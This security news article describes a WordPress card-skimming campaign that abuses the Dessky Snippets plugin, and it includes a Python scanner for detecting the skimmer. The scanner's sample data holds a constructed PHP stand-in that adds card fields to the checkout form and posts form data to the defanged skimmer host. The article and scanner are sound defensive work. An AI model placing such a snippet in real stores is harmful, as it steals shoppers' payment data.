Attack Exploits WordPress Plugin to Steal Card Data

A new campaign is abusing a lesser-known WordPress code snippets plugin, Dessky Snippets, to insert malicious PHP code into victim websites and harvest credit card data. The activity was observed by Sucuri on May 11, 2024. Dessky Snippets lets site owners add custom PHP code and has over 200 active installations; the campaign relies on that intended functionality rather than on a vulnerability in the plugin itself.

Attackers typically gain administrator access by exploiting known vulnerabilities in outdated plugins or by guessing weak credentials, then install additional plugins, legitimate or malicious, to extend their foothold. Sucuri reported that in this campaign the Dessky Snippets plugin is used to inject server-side PHP credit card skimming malware into infected websites and steal financial data.

Security researcher Ben Martin noted that the malicious code is stored in the dnsp_settings option of the WordPress wp_options table. It hooks the WooCommerce checkout process, manipulating the billing form and injecting its own code. Specifically, it adds several new fields to the billing form that request credit card details (name, address, card number, expiration date and CVV) and leaks this information to the URL hxxps://2of[.]cc/wp-content/.

Notably, the billing form associated with the fake overlay has its autocomplete attribute disabled (autocomplete="off"). Martin explained that by manually disabling this feature the attackers reduce the chance that the browser warns users about entering sensitive information, and ensure the fields stay blank until the shopper fills them in, so they look like routine, required checkout inputs and attract less suspicion.
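The two paragraphs above give a site owner enough to write a detection check: the skimmer lives in a snippet-plugin option in wp_options, hooks the WooCommerce billing fields, asks for card data with autocomplete switched off, and posts it to an external host. The following scanner is an added example written for this article; it is not Sucuri's, the plugin's or the skimmer's code. It assumes the option values have already been unserialized to plain PHP source (the real option is PHP-serialized), the indicator regexes are this example's own heuristics, the PHP snippets are constructed stand-ins that mimic the described behaviour rather than the real malware, and custom_snippet_footer is a hypothetical benign option name. Only dnsp_settings and the 2of[.]cc host come from the article.

```python
"""
Heuristic scan of WordPress wp_options rows for a server-side card skimmer
planted through a code-snippet plugin, as in the Dessky Snippets campaign.
Added example; not Sucuri's, the plugin's or the skimmer's code.
Assumes option values were unserialized to plain PHP text beforehand.
"""
import re
from dataclasses import dataclass

# Each indicator is ("category: label", regex). A row is reported as a
# probable skimmer only when it both tampers with the checkout form AND has
# a way to send data out; obfuscation is reported but not required.
INDICATORS = [
    ("form: woocommerce billing/checkout hook",
     re.compile(r"woocommerce_(?:billing|checkout)_fields", re.I)),
    ("form: card-data field",
     re.compile(r"card[_\s-]?num(?:ber)?|ccnum|cvv|cvc|expir", re.I)),
    # The autocomplete="off" / 'autocomplete' => 'off' trick noted by Martin
    ("form: autocomplete disabled",
     re.compile(r"autocomplete\W{1,8}off\b", re.I)),
    ("exfil: outbound HTTP call",
     re.compile(r"\b(?:curl_exec|curl_init|wp_remote_post|wp_remote_request|fsockopen)\s*\(", re.I)),
    # Host named in the article's IOC, matched fanged or defanged
    ("exfil: known skimmer host (2of[.]cc)",
     re.compile(r"\b2of(?:\.|\[\.\])cc\b", re.I)),
    ("obf: decode/eval",
     re.compile(r"\b(?:base64_decode|gzinflate|str_rot13|eval)\s*\(", re.I)),
]


@dataclass
class Finding:
    option_name: str
    indicators: list[str]


def scan_value(value: str) -> list[str]:
    """Return the labels of every indicator that matches this option value."""
    return [label for label, rx in INDICATORS if rx.search(value)]


def is_probable_skimmer(indicators: list[str]) -> bool:
    """Verdict rule: form tampering plus an exfiltration channel."""
    form = any(i.startswith("form:") for i in indicators)
    exfil = any(i.startswith("exfil:") for i in indicators)
    return form and exfil


def scan_options(rows: list[tuple[str, str]]) -> list[Finding]:
    """Scan (option_name, option_value) rows, e.g. the result of
    SELECT option_name, option_value FROM wp_options, and return findings."""
    findings = []
    for name, value in rows:
        hits = scan_value(value)
        if is_probable_skimmer(hits):
            findings.append(Finding(name, hits))
    return findings


# Constructed sample rows. The PHP bodies are stand-ins written for this
# example (not the real skimmer); 'custom_snippet_footer' is hypothetical.
BENIGN_SNIPPET = """
add_action('wp_footer', function () {
    echo '<p>Thanks for shopping with us.</p>';
});
"""

SKIMMER_LIKE_SNIPPET = """
add_filter('woocommerce_billing_fields', function ($fields) {
    $fields['billing_card_number'] = array('label' => 'Card Number', 'required' => true, 'autocomplete' => 'off');
    $fields['billing_card_exp']    = array('label' => 'Expiration',  'required' => true, 'autocomplete' => 'off');
    $fields['billing_card_cvv']    = array('label' => 'CVV',         'required' => true, 'autocomplete' => 'off');
    return $fields;
});
add_action('woocommerce_checkout_process', function () {
    wp_remote_post('hxxps://2of[.]cc/wp-content/', array('body' => $_POST));
});
"""

SAMPLE_OPTIONS = [
    ("siteurl", "https://shop.example"),
    ("custom_snippet_footer", BENIGN_SNIPPET),
    ("dnsp_settings", SKIMMER_LIKE_SNIPPET),
]

if __name__ == "__main__":
    for f in scan_options(SAMPLE_OPTIONS):
        print(f"[!] {f.option_name}: " + "; ".join(f.indicators))
```

Running it reports only dnsp_settings, with all three form-tampering indicators and both exfiltration indicators; the benign footer snippet and siteurl produce no hits. Because the verdict needs both a form-tampering and an exfiltration match, a legitimate snippet that merely customises WooCommerce checkout fields is not flagged on its own, which keeps the check usable across every option that a snippet plugin on the site might store, not just the Dessky one.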

This is not the first time threat actors have abused legitimate code snippets plugins. Last month, Sucuri disclosed attacks abusing the WPCode code snippets plugin to inject malicious JavaScript into WordPress websites and redirect visitors to VexTrio domains. Another campaign, dubbed Sign1, infected over 39,000 WordPress websites over the preceding six months by injecting malicious JavaScript through the Simple Custom CSS and JS plugin, redirecting users to scam sites.

WordPress site owners, especially those running e-commerce functionality, are advised to keep WordPress core, themes and plugins up to date, use strong, unique passwords (and multi-factor authentication where available) for administrator accounts to resist brute-force attacks, and regularly audit installed plugins, administrator users and stored code snippets for signs of malware or unauthorized changes.